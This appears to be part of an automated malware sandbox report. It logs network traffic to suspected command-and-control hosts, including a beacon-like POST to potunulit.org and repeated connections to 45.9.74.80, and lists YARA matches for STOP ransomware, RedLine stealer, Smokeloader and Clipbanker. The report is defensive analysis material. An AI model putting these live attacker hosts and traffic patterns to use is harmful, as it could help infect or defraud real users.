64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at c3g6gx853u6j.xyz Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:06:05 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 33 67 36 67 78 38 35 33 75 36 6a 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at c3g6gx853u6j.xyz Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:06:06 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 51Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e f8 8e b9 e7 a2 18 46 a8 9e 2f f0 ec 52 37 94 ee 8f f5 6e ad 8d 91 ae 79 a3 4c 8a e1 0d 64 da Data Ascii: %S`Nh&WQY^F/R7nyLd
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:06:15 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 404Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 33 67 36 67 78 38 35 33 75 36 6a 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at c3g6gx853u6j.xyz Port 80</address></body></html>
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: unknownTCP traffic detected without corresponding DNS query: 45.9.74.80
    Source: llpb1133.exe, 00000020.00000003.666449360.0000000000631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com equals www.facebook.com (Facebook)
    Source: llpb1133.exe, 00000020.00000003.666449360.0000000000631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com^ equals www.facebook.com (Facebook)
    Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jfevcbs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: potunulit.org
    Source: unknownHTTPS traffic detected: 176.61.150.108:443 -> 192.168.2.6:49721 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49727 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49732 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49736 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49744 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49747 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49755 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 190.114.9.88:443 -> 192.168.2.6:49768 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49770 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49781 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49783 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 67.199.248.10:443 -> 192.168.2.6:49790 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49791 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.6:49794 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 199.36.158.100:443 -> 192.168.2.6:49797 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 195.96.151.46:443 -> 192.168.2.6:49803 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 45.154.253.152:443 -> 192.168.2.6:49804 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.6:49807 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49813 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.6:49818 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.6:49830 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 45.15.156.204:443 -> 192.168.2.6:49837 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.6:49843 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49850 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49852 version: TLS 1.2

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Source: Yara matchFile source: 0000000B.00000002.375761103.00000000021C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000017.00000002.422932129.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.287959121.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000B.00000002.375723572.0000000002190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000017.00000002.422753808.0000000000620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.395645778.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.288034610.0000000000711000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.395590082.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 12.3.rundll32.exe.156f14a6d78.54.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 12.3.rundll32.exe.156f14aed98.53.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 12.3.rundll32.exe.156f14f0d38.51.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0000000C.00000003.358032607.00000156F15A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5500, type: MEMORYSTR
    Source: 1128.exe, 00000009.00000002.356909218.0000000000EAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
    Source: rundll32.exe, 0000000C.00000003.381473884.00000156EF9B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: NtUserGetRawInputData

    Spam, unwanted Advertisements and Ransom Demands

    barindex
    Source: Yara matchFile source: 27.2.DC3D.exe.22d15a0.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 18.2.A4A.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.2.A4A.exe.23e15a0.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 25.2.ECAC.exe.23d15a0.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 31.2.DC3D.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 18.2.A4A.exe.400000.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 31.2.DC3D.exe.400000.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 29.2.ECAC.exe.400000.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 13.2.A4A.exe.23e15a0.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 29.2.ECAC.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 27.2.DC3D.exe.22d15a0.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 25.2.ECAC.exe.23d15a0.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 42.2.A4A.exe.23215a0.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 42.2.A4A.exe.23215a0.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000019.00000002.413944051.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000002A.00000002.617050897.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001F.00000002.458356250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000002.417250083.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001D.00000002.453835364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000002.382455301.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: A4A.exe PID: 1332, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: A4A.exe PID: 2208, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: ECAC.exe PID: 6092, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: DC3D.exe PID: 3344, type: MEMORYSTR
    Source: rundll32.exe, 0000000C.00000003.386425445.00000156F12B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: ?_Mtx_unlock@threads@stdext@@YAXPEAX@Z
    Source: rundll32.exe, 0000000C.00000003.386425445.00000156F12B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ
    Source: rundll32.exe, 0000000C.00000003.386425445.00000156F12B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: ?_Unlock@?$basic_streambuf@GU?$char_traits@G@std@@@std@@UEAAXXZ
    Source: rundll32.exe, 0000000C.00000003.386425445.00000156F12B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: ?_Unlock@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@UEAAXXZ

    System Summary

    barindex
    Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
    Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
    Source: 27.2.DC3D.exe.22d15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
    Source: 27.2.DC3D.exe.22d15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: 18.2.A4A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
    Source: 18.2.A4A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: 13.2.A4A.exe.23e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
    Source: 13.2.A4A.exe.23e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: 25.2.ECAC.exe.23d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
    Source: 25.2.ECAC.exe.23d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: 31.2.DC3D.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
    Source: 31.2.DC3D.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: 18.2.A4A.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
    Source: 18.2.A4A.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: 31.2.DC3D.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
    Source: 31.2.DC3D.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: 29.2.ECAC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
    Source: 29.2.ECAC.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: 17.0.42FE.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
    Source: 13.2.A4A.exe.23e15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
    Source: 13.2.A4A.exe.23e15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: 29.2.ECAC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
    Source: 29.2.ECAC.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: 27.2.DC3D.exe.22d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
    Source: 27.2.DC3D.exe.22d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: 25.2.ECAC.exe.23d15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
    Source: 25.2.ECAC.exe.23d15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: 42.2.A4A.exe.23215a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
    Source: 42.2.A4A.exe.23215a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: 42.2.A4A.exe.23215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
    Source: 42.2.A4A.exe.23215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: 0000000E.00000002.705303961.0000000000606000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000014.00000002.439049903.00000000005E6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 0000000E.00000002.706906368.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.287939420.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.288156883.0000000000746000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000010.00000002.427978506.00000000005F6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000014.00000002.438844235.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 0000000B.00000002.375761103.00000000021C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000019.00000002.413944051.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: 0000002A.00000002.617050897.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: 0000001B.00000002.416891695.0000000002232000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000017.00000002.422729797.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 0000001F.00000002.458356250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
    Source: 0000001F.00000002.458356250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: 00000017.00000002.422861272.0000000000666000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000017.00000002.422932129.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 0000001B.00000002.417250083.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: 0000002A.00000002.587743224.000000000228A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000000.00000002.287959121.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000019.00000002.413738887.0000000002337000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 0000000F.00000002.395568327.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 0000000B.00000002.375723572.0000000002190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 0000000D.00000002.382364592.0000000002258000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 0000000B.00000002.375676925.00000000007C6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000017.00000002.422753808.0000000000620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 0000000F.00000002.395494716.0000000000616000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 0000000F.00000002.395645778.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000000.00000002.288034610.0000000000711000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 0000001D.00000002.453835364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
    Source: 0000001D.00000002.453835364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: 0000000B.00000002.375648108.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
    Source: 00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: 0000000F.00000002.395590082.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000010.00000002.427822773.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 0000000D.00000002.382455301.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: Process Memory Space: A4A.exe PID: 1332, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: Process Memory Space: A4A.exe PID: 2208, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: Process Memory Space: ECAC.exe PID: 6092, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: Process Memory Space: DC3D.exe PID: 3344, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
    Source: llpb1133.exe.17.drStatic PE information: .vmp0 and .vmp1 section names
    Source: C:\Users\user\AppData\Local\Temp\DE4C.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4776 -s 520
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00412C560_2_00412C56
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00410CE60_2_00410CE6
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004112370_2_00411237
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004137670_2_00413767
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004117880_2_00411788
